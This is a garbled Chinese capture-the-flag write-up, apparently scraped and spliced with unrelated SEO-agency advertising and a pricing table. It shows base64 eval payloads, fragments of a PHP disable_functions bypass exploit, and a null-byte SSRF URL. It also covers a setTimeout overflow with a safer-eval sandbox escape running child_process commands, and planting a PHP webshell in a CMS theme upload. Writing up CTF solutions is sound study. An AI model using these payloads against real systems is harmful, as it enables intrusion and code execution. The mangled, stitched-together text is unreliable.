96SEO 2026-02-19 19:08 14
。

这里出现了一个eval#xff08;#xff09;函数#xff0c;猜测考察命…[GKCTF
打开这道题目开始以为考察反序列化但实际并不是这里直接用$_REQUEST传入了参数便可以利用了。
这里出现了一个eval函数猜测考察命令执行
看到base64_decode说明我们的代码需要加密一下尝试着直接传入c3lzdGVtKCdscycpOw(即为base64加密后的system(ls);)
?GinkgoZXZhbCgkX1BPU1RbJ2FiYyddKTs
出现反应发现这个点是可以进行利用的应该是php过滤了危险函数在phpinfo中的disable_functions可以看到
?GinkgoZXZhbCgkX1BPU1RbJ2FiYyddKTs
expexploits/php7-gc-bypass/exploit.php
https://bugs.php.net/bug.php?id72530
https://github.com/mm0r1pwn(/readflag);function
a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:ryat:2:{s:4:ryat;R:3;s:4:chtg;i:2;}}i:1;i:3;i:2;R:5;};$out
unserialize($poc);gc_collect_cycles();$v
get_binary_base($binary_leak)))
handler($helper-b)($cmd);exit();
修改一下exp的执行目标“/readflag”通过蚁剑上传至tmp的权限较高
?Ginkgoinclude(’/tmp/test.php’);
Base64后?GinkgoaW5jbHVkZSgnL3RtcC90ZXN0LnBocCcpOw
在低于7.2.29的PHP版本7.2.x低于7.3.16的7.3.x和低于7.4.4的7.4.x中将get_headers与用户提供的URL一起使用时如果URL包含零\
0字符则URL将被静默地截断。
这可能会导致某些软件对get_headers的目标做出错误的假设并可能将某些信息发送到错误的服务器。
两者结合利用零字符截断使get_headers()请求到本地127.0.0.1
?urlhttp://127.0.0.1%00www.ctfhub.com提示Host必须以123结尾
?urlhttp://127.0.0.123%00www.ctfhub.com
express();app.use(bodyParser.urlencoded({
(Number.isInteger(parseInt(req.query.delay)))
parseInt(req.query.delay));}const
老板说让我优化一下速度我就直接这样写了其他人写了啥关我p事setTimeout(()
{clearTimeout(t);console.log(timeout);try
Wrong!!!!;}}res.send(String(response));
text/javascript;charsetutf-8);res.send(fs.readFileSync(./index.js));
text/json;charsetutf-8);res.send(fs.readFileSync(./package.json));
text/html;charsetutf-8);res.send(fs.readFileSync(./index.html))
require(safer-eval)nodejs的题在ha1cyon出现了几次一般涉及到nodejs的题就是沙箱逃逸而导致能够沙箱逃逸的通常都是库的问题题目有特地强调了这个safer-eval的库直接去github找issues----直接搜索safer-eval
(Number.isInteger(parseInt(req.query.delay)))
parseInt(req.query.delay));}const
老板说让我优化一下速度我就直接这样写了其他人写了啥关我p事setTimeout(()
{clearTimeout(t);console.log(timeout);try
{next();}访问/eval的路由会设置一个delay和你传入的get参数的delay进行比较取较大的那个然后setTimeout是延时函数delay秒后就会执行第一个参数即next()否则就会send出timeout。
浏览器内部使用32位带符号的整数来储存推迟执行的时间这意味着setTimeout最多延迟2147483647秒。
只要大于2147483647,就会发生溢出,就可以绕过那个时间限制进入下一个路由
/eval/?delay23333333333333333333333
Wrong!!!!;}}res.send(String(response));post传入参数e可以saferEval安全的执行代码这里想要成功执行需要进行逃逸。
process)().mainModule.require(child_process).execSync(cat
后台管理地址/admin.php?s/admin/logininfo.html
下载下来的主题是一个安装包然后把你的shellphp马子放到压缩包的default\_static_
回到网页上找到网站管理-主题管理-主题安装然后选择你加入shell后的主题压缩包进行上传
作为专业的SEO优化服务提供商,我们致力于通过科学、系统的搜索引擎优化策略,帮助企业在百度、Google等搜索引擎中获得更高的排名和流量。我们的服务涵盖网站结构优化、内容优化、技术SEO和链接建设等多个维度。
| 服务项目 | 基础套餐 | 标准套餐 | 高级定制 |
|---|---|---|---|
| 关键词优化数量 | 10-20个核心词 | 30-50个核心词+长尾词 | 80-150个全方位覆盖 |
| 内容优化 | 基础页面优化 | 全站内容优化+每月5篇原创 | 个性化内容策略+每月15篇原创 |
| 技术SEO | 基本技术检查 | 全面技术优化+移动适配 | 深度技术重构+性能优化 |
| 外链建设 | 每月5-10条 | 每月20-30条高质量外链 | 每月50+条多渠道外链 |
| 数据报告 | 月度基础报告 | 双周详细报告+分析 | 每周深度报告+策略调整 |
| 效果保障 | 3-6个月见效 | 2-4个月见效 | 1-3个月快速见效 |
我们的SEO优化服务遵循科学严谨的流程,确保每一步都基于数据分析和行业最佳实践:
全面检测网站技术问题、内容质量、竞争对手情况,制定个性化优化方案。
基于用户搜索意图和商业目标,制定全面的关键词矩阵和布局策略。
解决网站技术问题,优化网站结构,提升页面速度和移动端体验。
创作高质量原创内容,优化现有页面,建立内容更新机制。
获取高质量外部链接,建立品牌在线影响力,提升网站权威度。
持续监控排名、流量和转化数据,根据效果调整优化策略。
基于我们服务的客户数据统计,平均优化效果如下:
我们坚信,真正的SEO优化不仅仅是追求排名,而是通过提供优质内容、优化用户体验、建立网站权威,最终实现可持续的业务增长。我们的目标是与客户建立长期合作关系,共同成长。
Demand feedback